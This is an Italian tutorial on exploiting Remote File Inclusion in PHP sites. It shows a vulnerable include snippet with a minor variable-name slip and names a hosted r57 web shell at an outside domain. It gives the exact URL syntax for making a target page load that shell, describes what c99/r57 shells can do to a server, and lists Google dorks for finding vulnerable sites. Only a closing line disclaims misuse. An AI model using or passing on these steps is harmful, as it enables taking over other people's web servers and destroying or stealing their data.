====== INTRODUZIONE ====== Un saluto a tutti! Rieccomi alle prese con un altra guida.... Per chi non lo sapesse RFI sta per Remote File Inclusion, altro non è che una delle tante vulnerabilità presenti (aimè) nelle pagine web dinamiche, che, spero, dopo aver letto questa guida siate in grado di saper sfruttare al meglio in modo da evitare problemi con il vostro sito. Questa tecnica consiste nell'includere un file in una pagina tramite delle variabili presenti nella pagina stessa che non sono controllate. ====== Vediamo un po' ====== Facciamo un esempio molto veloce e pratico... Creiamo per il nostro sito in php una pagina che chiameremo "prova" con il seguente codice: $variabile1=$_GET[’pag‘]; include($variabile); Cosa abbiamo scritto? Praticamente assegnamo il valore prova.php alla variabile chiamata //“variabile”// e tramite la funzione //"include"// la include nella pagina. Per sfruttare questa vulnerabilità abbiamo bisogno di uno script in php maligno (che trovate su blackserver.hopto.org). Vi semplifico la vita dicendovi che lo script sta a questo indirizzo: http://blackserver.hopto.org/r57.txt ora per far eseguire il nostro script maligno sulla nostra pagina di prova dovremmo digitare questo nella pagina degli indirizzi: http://sito.tuo.it/index.php?pag=http://blackserver.hopto.org/r57.txt E' lo script viene caricato.... ====== SHELL PHP ====== Le shell php sono degli script con cui potete fare di tutto...dall'upload, all'editing, al cancellamento di file e far eseguire i comandi del terminale. Le shell più note sono la c99 e la r57. Non vi spiego nel dettaglio il loro utilizzo poichè hanno un interfaccia che....come si dice....USER FRIENDLY....praticamente è facile da capire come funzionano. Vi ricordo la sintassi: sito.com/index.php?variabile_non_controllata=indirizzo_shell.txt ====== Trovare siti vulnerabili ====== Per trovare siti vulnerabili a questo tipo di attacco ci sono vari modi: o usate uno scanner oppure usate un ottimo motore di ricerca. Io vi consiglio di utilizzare google.... inurl:index.php?page= inurl:index.php?include= index.php?x= | inurl:”index.php?x=*.php” index.php?nic= | inurl:”index.php?nic=*.php” homepage.php?sel= | inurl:”homepage.php?sel=*.php” index.php?sel= | inurl:”index.php?sel=*.php” main.php?x= | inurl:”main.php?x=*.php” index2.php?x= | inurl:index2.php?x=*.php” main.php?pagina= | inurl:”main.php?pagina=*.php” test.php?page= | inurl:test.php?page= Buona Ricerca... ====== CONCLUSIONE ====== Spero che questa guida via sia stata utile (anche se me ne pento), ergo spero che usiate questa guida NON per fare danni...ma per testare il vostro sito e/o segnalare la presenza di questo bug... Saluti Paz